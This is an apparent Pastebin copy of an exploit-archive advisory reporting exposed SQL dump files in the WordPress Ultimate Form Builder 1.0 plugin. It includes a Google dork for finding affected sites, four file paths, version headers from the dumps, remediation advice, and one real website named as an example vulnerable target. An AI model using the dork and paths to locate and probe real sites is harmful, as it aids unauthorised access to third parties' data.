API tools faq
paste
KingSkrupellos

WordPress Ultimate Form Builder 1.0 Database Disclosure

KingSkrupellos
Mar 28th, 2019
365
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.67 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress Ultimate Form Builder Plugins 1.0 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/03/2019
  7. # Vendor Homepage : access-keys.com
  8. # Software Information Link :
  9. codecanyon.net/item/ultimate-form-builder/14644208
  10. accesspressthemes.com/wordpress-plugins/ultimate-form-builder/
  11. access-keys.com/documentation/ultimate-form-builder-lite/
  12. # Software Version : WordPress Version 4.x and 5.x - Plugin Version 1.0
  13. # Software Price : Paid Download - 32$
  14. # Tested On : Windows and Linux
  15. # Category : WebApps
  16. # Exploit Risk : Medium
  17. # Google Dorks : filetype:sql inurl:/wp-content/plugins/ultimate-form-builder/
  18. # Vulnerability Type :
  19. CWE-200 [ Information Exposure ]
  20. CWE-538 [ File and Directory Information Exposure ]
  21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  24. # Acunetix Information Link about phpMyAdmin SQL dump File =>
  25. acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
  26. # Reference Link : cxsecurity.com/issue/WLB-2019030236
  27. packetstormsecurity.com/files/152284/WordPress-Ultimate-Form-Builder-1.0-Database-Disclosure.html
  28.  
  29. ############################################################################################
  30.  
  31. # Description about Software :
  32. ***************************
  33. Ultimate Form Builder is a PREMIUM WordPress Plugin which allows you to create unlimited responsive forms
  34.  
  35. (single step or multi-steps). Anytype of forms (Contact us, Opt-in, Call-to-Action, Survey, Quotation, Enquiry or anything)
  36.  
  37. can be built using drag and drop form builder. Using this plugin is super easy and fun because – you can create, customize
  38.  
  39. and build beautiful forms, apply existing form templates for design and use them right onto your WP site in no time.
  40.  
  41. You can receive form submission data via email and store them in the database which can be exported
  42.  
  43. to CSV for your use via plugin’s backend.
  44.  
  45. ############################################################################################
  46.  
  47. # Impact :
  48. ***********
  49. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
  50.  
  51. to have access to that information.
  52.  
  53. * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.
  54.  
  55. * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web.
  56.  
  57. It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server).
  58.  
  59. The dump typically contains SQL statements to create the table, populate it, or both. This file contains an phpMyAdmin SQL dump.
  60.  
  61. This information is highly sensitive and should not be found on a production system.
  62.  
  63. Remediation : Restrict access to this file or remove it from the system.
  64.  
  65. ############################################################################################
  66.  
  67. # Database Disclosure Exploit :
  68. ****************************
  69. /wp-content/plugins/ultimate-form-builder/tables/cities.sql
  70.  
  71. Information :
  72. ***********
  73. -- phpMyAdmin SQL Dump
  74. -- version 3.4.10.1
  75. -- phpmyadmin.net
  76. --
  77. -- Host: localhost
  78. -- Server version: 5.5.20
  79. -- PHP Version: 5.3.10
  80.  
  81. /wp-content/plugins/ultimate-form-builder/tables/countries.sql
  82.  
  83. Information :
  84. ***********
  85. -- phpMyAdmin SQL Dump
  86. -- version 3.4.10.1
  87. -- phpmyadmin.net
  88. --
  89. -- Host: localhost
  90. -- Server version: 5.5.20
  91. -- PHP Version: 5.3.10
  92.  
  93. /wp-content/plugins/ultimate-form-builder/tables/db_country_state_city.sql
  94.  
  95. Information :
  96. ***********
  97. -- phpMyAdmin SQL Dump
  98. -- version 3.4.10.1
  99. -- phpmyadmin.net
  100. --
  101. -- Host: localhost
  102. -- Server version: 5.5.20
  103. -- PHP Version: 5.3.10
  104.  
  105. /wp-content/plugins/ultimate-form-builder/tables/states.sql
  106.  
  107. Information :
  108. ***********
  109. -- phpMyAdmin SQL Dump
  110. -- version 3.4.10.1
  111. -- phpmyadmin.net
  112. --
  113. -- Host: localhost
  114. -- Server version: 5.5.20
  115. -- PHP Version: 5.3.10
  116.  
  117. ############################################################################################
  118.  
  119. # Example Vulnerable Sites :
  120. *************************
  121. [+] ema-ic.it/wp-content/plugins/ultimate-form-builder/tables/states.sql
  122.  
  123. ############################################################################################
  124.  
  125. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  126.  
  127. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!